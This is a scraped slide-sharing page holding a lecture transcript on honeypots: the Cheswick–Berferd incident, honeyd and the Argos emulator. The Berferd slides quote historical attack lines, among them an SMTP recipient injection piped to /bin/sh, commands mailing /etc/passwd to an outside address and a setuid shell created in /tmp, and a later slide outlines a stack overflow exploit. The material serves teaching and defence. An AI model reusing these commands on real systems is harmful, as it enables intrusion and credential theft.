Honeypots Learning how attackers operate

Slides:



Advertisements
Similar presentations
HONEYPOTS Mathew Benwell, Sunee Holland, Grant Pannell.
Advertisements

ITIS 1210 Introduction to Web-Based Information Systems Chapter 44 How Firewalls Work How Firewalls Work.
Countermeasures 0x610~0x Seokmyung Hong.
Honeypot 서울과학기술대학교 Jeilyn Molina Honeypot is the software or set of computers that are intended to attract attackers, pretending to be weak.
5/1/2006Sireesha/IDS1 Intrusion Detection Systems (A preliminary study) Sireesha Dasaraju CS526 - Advanced Internet Systems UCCS.
Sanjay Goel, School of Business/Center for Information Forensics and Assurance University at Albany Proprietary Information 1 Unit Outline Information.
Intrusion Detection using Honeypots Patrick Brannan Honeyd with virtual machines.
Information Networking Security and Assurance Lab National Chung Cheng University 1 A Real World Attack: wu-ftp.
Ch. 31 Q and A IS 333 Spring 2015 Victor Norman. SNMP, MIBs, and ASN.1 SNMP defines the protocol used to send requests and get responses. MIBs are like.
FIREWALL TECHNOLOGIES Tahani al jehani. Firewall benefits  A firewall functions as a choke point – all traffic in and out must pass through this single.
Introduction to Honeypot, Botnet, and Security Measurement
1 Reconnaissance, Network Mapping, and Vulnerability Assessment ECE4112 – Internetwork Security Georgia Institute of Technology.
Presentation on Osi & TCP/IP MODEL
FTP (File Transfer Protocol) & Telnet
Kirby Kuehl Honeynet Project Member 05/08/2002 Intrusion Deception.
Simple Mail Transfer Protocol (SMTP)
HoneyD (Part 2) Small Business NIDS This presentation demonstrates the ability for Small Businesses to emulate virtual operating systems and conduct.
Honeypots. Introduction A honeypot is a trap set to detect, deflect, or in some manner counteract attempts at unauthorized use of information systems.
ECE4112 Lab 7: Honeypots and Network Monitoring and Forensics Group 13 + Group 14 Allen Brewer Jiayue (Simon) Chen Daniel Chu Chinmay Patel.
Honeypot and Intrusion Detection System
BLENDED ATTACKS EXPLOITS, VULNERABILITIES AND BUFFER-OVERFLOW TECHNIQUES IN COMPUTER VIRUSES By: Eric Chien and Peter Szor Presented by: Jesus Morales.
A Virtual Honeypot Framework Author: Niels Provos Published in: CITI Report 03-1 Presenter: Tao Li.
Implementing a Port Knocking System in C Honors Thesis Defense by Matt Doyle.
Bugs SATAN scans for It is interesting to look at the bugs SATAN scans for. They are easily detected by the scanners and therefore do not pose a threat.
KFSensor Vs Honeyd Honeypot System Sunil Gurung
Vigilante: End-to-End Containment of Internet Worms Authors : M. Costa, J. Crowcroft, M. Castro, A. Rowstron, L. Zhou, L. Zhang, and P. Barham In Proceedings.
Presented by Spiros Antonatos Distributed Computing Systems Lab Institute of Computer Science FORTH.
A VIRTUAL HONEYPOT FRAMEWORK Author : Niels Provos Publication: Usenix Security Symposium Presenter: Hiral Chhaya for CAP6103.
1 Honeypot, Botnet, Security Measurement, Spam Cliff C. Zou CDA /01/07.
A Virtual Honeypot Framework Niels Provos Google, Inc. The 13th USENIX Security Symposium, August 9–13, 2004 San Diego, CA Presented by: Sean Mondesire.
CHAPTER 9 Sniffing.
Securing the Network Infrastructure. Firewalls Typically used to filter packets Designed to prevent malicious packets from entering the network or its.
Introduction to Honeypot, measurement, and vulnerability exploits
Lecture 12 Page 1 CS 236, Spring 2008 Virtual Private Networks VPNs What if your company has more than one office? And they’re far apart? –Like on opposite.
1 HoneyNets. 2 Introduction Definition of a Honeynet Concept of Data Capture and Data Control Generation I vs. Generation II Honeynets Description of.
Topics Network topology Virtual LAN Port scanners and utilities Packet sniffers Weak protocols Practical exercise.
Switch Features Most enterprise-capable switches have a number of features that make the switch attractive for large organizations. The following is a.
Worm Defense Alexander Chang CS239 – Network Security 05/01/2006.
EC week Review. Rules of Engagement Teams selected by instructor Host will read the entire questions. Only after, a team may “buzz” by raise of.
Argos Emulator Georgios Portokalidis Asia Slowinska Herbert Bos Vrije Universiteit Amsterdam.
DoS/DDoS attack and defense
Firewalls A brief introduction to firewalls. What does a Firewall do? Firewalls are essential tools in managing and controlling network traffic Firewalls.
Role Of Network IDS in Network Perimeter Defense.
An Evening with Berferd Bill Cheswick, USENIX 1990 Presented by Chris Grier.
Ch. 31 Q and A IS 333 Spring 2016 Victor Norman. SNMP, MIBs, and ASN.1 SNMP defines the protocol used to send requests and get responses. MIBs are like.
Network Devices and Firewalls Lesson 14. It applies to our class…
Using Honeypots to Improve Network Security Dr. Saleh Ibrahim Almotairi Research and Development Centre National Information Centre - Ministry of Interior.
Chapter 7: Using Network Clients The Complete Guide To Linux System Administration.
Common System Exploits Tom Chothia Computer Security, Lecture 17.
Chapter 7: Using Windows Servers
Protecting Memory What is there to protect in memory?
Jonathan Walpole Computer Science Portland State University
COEN 152 / 252 Computer Forensics
Protecting Memory What is there to protect in memory?
Web Development Web Servers.
Protecting Memory What is there to protect in memory?
Firewall – Survey Purpose of a Firewall Characteristic of a firewall
Chapter 3. Basic Dynamic Analysis
CORE Security Technologies
Local Worm Detection using Honeypots Justin Miller Jan 25, 2007
12/6/2018 Honeypot ICT Infrastructure Sashan
Friday, December 07, 2018 Honeypot ICT Infrastructure Sashan Kantonsspital Graubunden ICT Department.
Lecture 3: Secure Network Architecture
Networking Theory (part 2)
Network hardening Chapter 14.
Chapter 7 Network Applications
Crisis and Aftermath Morris worm.
Session 20 INST 346 Technologies, Infrastructure and Architecture
Introduction to Internet Worm
Networking Theory (part 2)
Presentation transcript:

Honeypots Learning how attackers operate CS-695 Host Forensics Georgios Portokalidis

Agenda Introduction The first (human) honeypot Honeyd: a framework for simulating hosts and networks Argos: a high interaction honeypot VM 2/12/2013 CS-695 Host Forensics

Honeypots and Decoys Introduction 2/12/2013 CS-695 Host Forensics

How do users/attackers operate? Questions We are trying to answer IF WHO WHAT HOW WHEN WHY How do users/attackers operate? Did something happen, and who, what,…? 2/12/2013 CS-695 Host Forensics

Learn How Attackers Operate Monitor user/attacker actions and learn. 2/12/2013 CS-695 Host Forensics

Traps Monitoring users “in the wild” is hard We need to trap them No kidnappings The target must be unaware Otherwise? They can fake their behavior Counterattack 2/12/2013 CS-695 Host Forensics

A honey pot is any container used to store honey. Honeypots A honey pot is any container used to store honey. 2/12/2013 CS-695 Host Forensics

Computing Honeypot A decoy host or network No production purpose Aims to attract attackers Heavily monitored 2/12/2013 CS-695 Host Forensics

Honey = Something Worth Getting In our case? User data Credit cards SSN Passwords Corporate data A Compromised system Send SPAM Perform DDoS Stepping stone Distribute malware …. 2/12/2013 CS-695 Host Forensics

Also for Defense Honeypots or tarpits can be also used for defensive purposes Keep attackers preoccupied with dummy systems Delay network connections Slowdown computer worms Automatically launch counter attacks? Unethical, illegal, and dangerous 2/12/2013 CS-695 Host Forensics

Honeypot Types based on Interaction High Low Real OS and services Virtual or physical Harder to detect More expensive to maintain A program Simulates OS and services Scripts interact with the attacker instead Can simulate entire networks (see honeyd) 2/12/2013 CS-695 Host Forensics

Honeypot Types based on Use Production Research Usually low interaction Used for: Early warning Improving security Slowing down attackers Both low and high interaction Capture more information Used for: Learning about attackers & attacks Developing defenses 2/12/2013 CS-695 Host Forensics

Targeted Honeypots Spam honeypots E-mail traps Detectable honeypots Pretend to be an open (misconfigured) email relay server E-mail traps Funnel all emails to non-existing accounts to a monitoring account Detectable honeypots Deter attackers 2/12/2013 CS-695 Host Forensics

Honeynets A set of honeypots deployed in one or more networks Collaborative monitoring References: http://www.leurrecom.org/ http://www.honeyathome.org/ SweetBait: Zero-Hour Worm Detection and Containment Using Low- and High-Interaction Honeypots (in syllabus) 2/12/2013 CS-695 Host Forensics

Monitoring Depends on the type of honeypot Typical monitored interfaces Network Tcpdump Actual ethernet taps System calls Service requests Downloaded/uploaded files Time travelling virtual machines! 2/12/2013 CS-695 Host Forensics

The first (human) honeypot Bill Chesswick vs Berferd The first (human) honeypot 2/12/2013 CS-695 Host Forensics

Overview Bill Cheswick, “An Evening with Berferd In Which a Cracker is Lured, Endured, and Studied”, USENIX 1990 An attacker thought he found a vulnerable sendmail server in AT&T Bell labs He tried to exploit it to get the password file Cheswick is alerted to the attempt, and instead of denying plays along Sends a bogus copy of a password file The attacker was monitored for several months Cheswick responds on the spot to the attackers commands 2/12/2013 CS-695 Host Forensics

AT&T’s Network Internet gateway or firewall guards periphery AT&T network Filtered traffic is discarded 2/12/2013 CS-695 Host Forensics

The First Firewall Internet gateway or firewall guards periphery Probe rates go up during college vacations. Log attempted username Serve fake /etc/passwd FTP Honeypot script Log login attempts Telnet Filtered traffic is discarded Log program called SMTP DEBUG exploit Logs size 10MB/day 2/12/2013 CS-695 Host Forensics

19:43:10 smtpd: <--- 220 inet.att.com SMTP 19:43:14 smtpd: -------> debug 19:43:14 smtpd: DEBUG attempt 19:43:14 smtpd: <--- 200 OK 19:43:25 smtpd: -------> mail from:</dev/null> 19:43:25 smtpd: <--- 503 Expecting HELO 19:43:34 smtpd: -------> helo 19:43:34 smtpd: HELO from 19:43:34 smtpd: <--- 250 inet.att.com 19:43:42 smtpd: -------> mail from: </dev/null> 19:43:42 smtpd: <--- 250 OK 19:43:59 smtpd: -------> rcpt to:</dev/ ˆHˆHˆHˆHˆHˆHˆHˆHˆHˆHˆHˆHˆHˆHˆHˆH 19:43:59 smtpd: <--- 501 Syntax error in recipient name 19:44:44 smtpd: -------> rcpt to:<|sed -e ’1,/ˆ$/’d | /bin/sh ; exit 0"> 19:44:44 smtpd: shell characters: |sed -e ’1,/ˆ$/’d | /bin/sh ; exit 0" 19:44:45 smtpd: <--- 250 OK 19:44:48 smtpd: -------> data 19:44:48 smtpd: <--- 354 Start mail input; end with <CRLF>.<CRLF> 19:45:04 smtpd: <--- 250 OK 19:45:04 smtpd: /dev/null sent 48 bytes to upas.security 19:45:08 smtpd: -------> quit 19:45:08 smtpd: <--- 221 inet.att.com Terminating 19:45:08 smtpd: finished. Unfriendly activity 2/12/2013 CS-695 Host Forensics

The passwd File Two commands were sent to retrieve the passwd file 19:45 mail adrian@embezzle.stanford.edu </etc/passwd 19:51 mail adrian@embezzle.stanford.edu </etc/passwd Stanford was notified Guess what? The adrian account was compromised Later, an email from France I have just closed an account on my machine which has been broken by an intruder coming from embezzle.stanford.edu. He (she) has left a file called passwd. 2/12/2013 CS-695 Host Forensics

berferd Appears New command submitted through sendmail How to accommodate berferd without compromising security? Cannot give him a shell Berferd had to keep using sendmail Cheswick is at the other end watching the logs produced and simulating the effects of the commands 22:36 echo "beferdd::300:1:maybe Beferd:/:/bin/sh" >>/etc/passwd cp /bin/sh /tmp/shell chmod 4755 /tmp/shell 2/12/2013 CS-695 Host Forensics

Some Decisions FTP password file was the real one Gateway machine to seem poorly administered The gateway machine is really slow Changes are made manually! The shell doesn’t reside in /bin (!) 2/12/2013 CS-695 Host Forensics

Giving Berferd a Shell Simulating the attacker’s commands takes too long A safe account had to be given How? A Chroot jail changes the root directory Provides a user with a limited view of the system Easily detectable Many programs won’t work Devices don’t exist, some things need to be copied to the new environment They had to rely on berferd’s hastiness tcpdump logs all of berferd’s I/O 2/12/2013 CS-695 Host Forensics

More compromised hosts were detected and victims notified Why Bother? All this required a lot of effort More compromised hosts were detected and victims notified 2/12/2013 CS-695 Host Forensics

Lessons If a hacker obtains a login on a machine, there is a good chance he can become root sooner or later. Any ideas how? Jails are not worth the effort Too complex and time consuming Not quite secure Do you know any alternatives? 2/12/2013 CS-695 Host Forensics

Honeypots made easy Virtual Honeypots 2/12/2013 CS-695 Host Forensics

What are the benefits of virtual honeypots? Why? Physical honeypots Virtual honeypots What are the benefits of virtual honeypots? Internet Internet Suspicious traffic Suspicious traffic Normal traffic Unused IP address Regular IP address 2/12/2013 CS-695 Host Forensics

Goals Deploy multiple virtual honeypots cheaply Simulate Services Networks Believability? Fool TCP/IP fingerprinting tools Xprobe, Nmap Could it fool a human? 2/12/2013 CS-695 Host Forensics

Design Simulate multiple hosts Simulate entire networks Linux 2.6 10.0.0.101 Windows XP 10.0.0.102 FreeBSD 8.3 10.0.0.103 honeyd 10.0.0.1 Internet Internet Simulate entire networks 2/12/2013 CS-695 Host Forensics

Receiving Data Get the network to forward packets for virtual honeypots to honeyd Methods Proxy ARP Manual configuration Who has 10.0.0.101? To: 10.0.0.101 Me: 11:ea:4b:67:04:15? 10.0.0.101 10.0.0.102 10.0.0.103 10.0.0.104 2/12/2013 CS-695 Host Forensics

Processing Data Routing Protocol handling Deliver to service Make responses fit a “personality” Fake network architecture 2/12/2013 CS-695 Host Forensics

Personalities Responses imitate the network stats of real Oses Packet headers are modified before transmitted Generated fields imitate a “personality” TCP sequence no Timestamps Imitate behavior of closed ports Nmap example Fingerprint IRIX 6.5.15m on SGI O2 TSeq(Class=TD%gcd=<104%SI=<1AE%IPID=I%TS=2HZ) T1(DF=N%W=EF2A%ACK=S++%Flags=AS%Ops=MNWNNTNNM) T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=) T3(Resp=Y%DF=N%W=EF2A%ACK=O%Flags=A%Ops=NNT) T4(DF=N%W=0%ACK=O%Flags=R%Ops=) T5(DF=N%W=0%ACK=S++%Flags=AR%Ops=) T6(DF=N%W=0%ACK=O%Flags=R%Ops=) T7(DF=N%W=0%ACK=S%Flags=AR%Ops=) PU(Resp=N) 2/12/2013 CS-695 Host Forensics

Configuration 2/12/2013 CS-695 Host Forensics route entry 10.0.0.1 route 10.0.0.1 link 10.0.0.0/24 route 10.0.0.1 add net 10.1.0.0/16 10.1.0.1 latency 55ms loss 0.1 route 10.0.0.1 add net 10.2.0.0/16 10.2.0.1 latency 20ms loss 0.1 route 10.1.0.1 link 10.1.0.0/24 route 10.2.0.1 link 10.2.0.0/24 create routerone set routerone personality "Cisco 7206 running IOS 11.1(24)" set routerone default tcp action reset add routerone tcp port 23 "scripts/router-telnet.pl  create netbsd set netbsd personality "NetBSD 1.5.2 running on a Commodore Amiga (68040 processor)" set netbsd default tcp action reset add netbsd tcp port 22 proxy $ipsrc:22 add netbsd tcp port 80 "scripts/web.sh“ bind 10.0.0.1 routerone bind 10.1.0.2 netbsd bind 10.1.0.3 to fxp0 2/12/2013 CS-695 Host Forensics

Logging Tcpdump Service scripts 2/12/2013 CS-695 Host Forensics

Lessons We can easily run thousands of virtual honeypots on a single server What can we do with the collected data? Is it safe? We can fool network scanners by imitating network stacks Limitations? 2/12/2013 CS-695 Host Forensics

Automatically fingerprinting intruders High-interaction advertised honeypots Automatically fingerprinting intruders 2/12/2013 CS-695 Host Forensics

Why? Too many vulnerabilities New (worm) attacks Human intervention too slow Current solutions are problematic Time consuming Inaccurate 2/12/2013 CS-695 Host Forensics

We Are Slower than Ever July 19, 2001 spread of CODE RED in 24 hours! Jan 29, 2003 spread of SLAMMER in 30 minutes! 2/12/2013 CS-695 Host Forensics

The Internet is Faster than Ever 2/12/2013 CS-695 Host Forensics

(Most) Honeypots Passive Good for IP scanning based attacks Insufficient for network specific malware today How about future hit-list worms? 2/12/2013 CS-695 Host Forensics

A New Type of Honeypot Advertise our presence Accurate alerts Attract attackers Accurate alerts We can ignore non-attack data 2/12/2013 CS-695 Host Forensics

The Argos Emulator Goal: create an automated response system for previously unknown self-propagating attacks that reliably detects attacks with no (or very few) false positives generates reliable signatures Protect an entire OS (kernel and applications) Capture a wide-range of memory corruption exploits Intercept attacker’s code to inject our own forensics code Signatures are automatically refined and distributed Designed for “advertised honeypots” Performance is not critical for its adoption Signatures allow us to protect many systems by deploying network filters on the edges of networks. Snort is one of the most popular signature-based intrusion detection and prevention systems 2/12/2013 CS-695 Host Forensics

What Kind of Bugs are We Protecting A stack buffer overflow 1004 old PC 1003 old frame 1002 void my_bug () { int Buf [10]; int c; while ((c=getchar()) != 0) { *Buf = c; Buf++; } 1001 1000 frame for my_bug 999 Buf 998 997 996 “space for X” 995 “space for Y” 994 C 993 992 2/12/2013 CS-695 Host Forensics

To Exploit This Bug We load our program in Buf We overwrite the return address at 1004 with the begin address of Buf (995) These days it is not so simple …but we also have heap overflows, heap sprays, format strings … 1004 old PC new address 1003 old frame 1002 1001 1000 frame for my_bug 999 Buf 998 997 996 “space for X” 995 “space for Y” 994 C 993 992 2/12/2013 CS-695 Host Forensics

Argos Overview Memory Applications Guest OS Argos Emulator Host OS Simpler, move bo earlier Host OS 2/12/2013 CS-695 Host Forensics

Argos Overview Post-Processing Sub-system Applications Forensics shellcode Snitch Guest OS Argos Emulator Host OS Post-Processing Sub-system Signature 2/12/2013 CS-695 Host Forensics

Memory mapped data, IPC, DMA are all handled! Network Data Tracking Register = network_read Registers Reg. A = Reg. A + Reg. B Registers Registers Memory Memory(A) = Reg. A Memory mapped data, IPC, DMA are all handled! Reg.B = Reg.A / 156.345 Registers 2/12/2013 CS-695 Host Forensics

What Is the Nature of the Tags? Binary memory tags (e.g., 1 = tainted, 0 = clean) Larger register tags Shadow memory mem_addr is tainted EAX Shadow register EAX mem_addr Offset in the network trace (colored tags) More information, but slower and lossy Shadow memory Incoming network data trace offset 2/12/2013 CS-695 Host Forensics

How Are the Tags Stored? Flat array Allocated at startup 1-bit or 1-byte per byte 101001110101110101001011001001 2/12/2013 CS-695 Host Forensics

How Are the Tags Stored? Single-level page table Page directory allocated at startup Dynamically managed pages 101001110101110101001011001001 101001110101110101001011001001 101001110101110101001011001001 2/12/2013 CS-695 Host Forensics

Identifying Attacks Introduce code through QEMU to check for Control flow diversion Code-injection Overwritten system call arguments execv(“/bin/sh”) Tagged Register Operands JMP CALL Tagged Memory RET SYSCALL 2/12/2013 CS-695 Host Forensics

It Works! Apache chunked encoding overflow IIS ISAPI .printer host header overflow WebDav ntdll.dll overflow FrontPage Server Extensions Debug Overflow War-FTP overflow ASN.1 Library Bitstring Heap Overflow Windows Message Queueing Remote Overflow RPC DCOM Interface overflow LSASS Overflow Windows PnP Service Remote Overflow nbSMTP remote format string exploit WMF exploit 2/12/2013 CS-695 Host Forensics

Forensics Applications Virtual Address Space Process name Linked Libraries Open Ports Guest OS Virtual Address Space Registers RAM Argos Emulator 2/12/2013 Memory dump CS-695 Host Forensics

Sweetbait[Computer Networks 07] Signature Generation Logged Network Flows Argos Memory Log Critical Exploit Bytes (e.g. value loaded on EIP) New Signature Sweetbait[Computer Networks 07] A collaborative IDS & IPS Using Low- and High-interaction Honeypots Similar Signatures Generalized Signature 2/12/2013 CS-695 Host Forensics

Lessons Dynamic taint analysis is a powerful technique Detects/prevents common attack vectors And worms What else could it be used for? What attacks can’t it detect? Mostly suitable for honeypots Too slow for most loads 2/12/2013 CS-695 Host Forensics

Honeypots Today Still in use Many attacks are now targeting client applications Client-side honeypots Honeytokens Decoy data Monitor for use/observation of honeytokens What does it indicate? 2/12/2013 CS-695 Host Forensics